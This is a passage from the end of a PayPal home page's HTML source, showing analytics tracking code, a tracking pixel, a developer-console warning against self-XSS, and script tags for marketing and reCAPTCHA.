fptiDataString += "&gacook=" + gaClientId;
}
callFpti(fptiDataString);
});
} else {
callFpti(fptiDataString);
}
}
}());
</script>
<noscript><img src="https://t.paypal.com/ts?nojs=1&pgrp=main%3Amktg%3Apersonal%3A%3Ahome&page=main%3Amktg%3Apersonal%3A%3Ahome%3A%3A%3A&pgst=Unknown&calc=f25733842baa4&nsid=tXtCeWvdvcZvVyR17zYeSHeRuwGi1YlW&rsta=en_MA&pgtf=Nodejs&env=live&s=ci&ccpg=ma&csci=c94d54d592d84e3bb8899043a6709662&comp=mppnodeweb&tsrce=authchallengenodeweb&cu=1&gacook=1099837400.1674677043&xe=104449&xt=119299&pgld=Unknown&bzsr=main&bchn=mktg&tmpl=home.dust&pgsf=personal&lgin=out&shir=main_mktg_personal_&pros=3&lgcook=2&event_props=cu%2Clgin%2Cpage%2Cxe%2Cxt&user_props=cu%2Cxe%2Cxt&event_name=ppcom_page_viewed&page_segment=ppcom" alt="" height="1" width="1" border="0"></noscript>
<script nonce="n+rmAZ+Q0YaZ8gOb4OjXWJ9QFk+hjw2dcGZpnPt17NIB2scL" >
$(document).ready(function(){
if(window.console || "console" in window) {
console.log("%c WARNING!!!", "color:#FF8F1C; font-size:40px;");
console.log("%c This browser feature is for developers only. Please do not copy-paste any code or run any scripts here. It may cause your PayPal account to be compromised.", "color:#003087; font-size:12px;");
console.log("%c For more information, http://en.wikipedia.org/wiki/Self-XSS", "color:#003087; font-size:12px;");
}
});
</script>
<script src="https://www.paypalobjects.com/activation/js/marketingIntentsV2.js" defer></script>
<script async src="/auth/createchallenge/b0791f4183799609/recaptchav3.js?_sessionID=tXtCeWvdvcZvVyR17zYeSHeRuwGi1YlW"></script></body>
</html>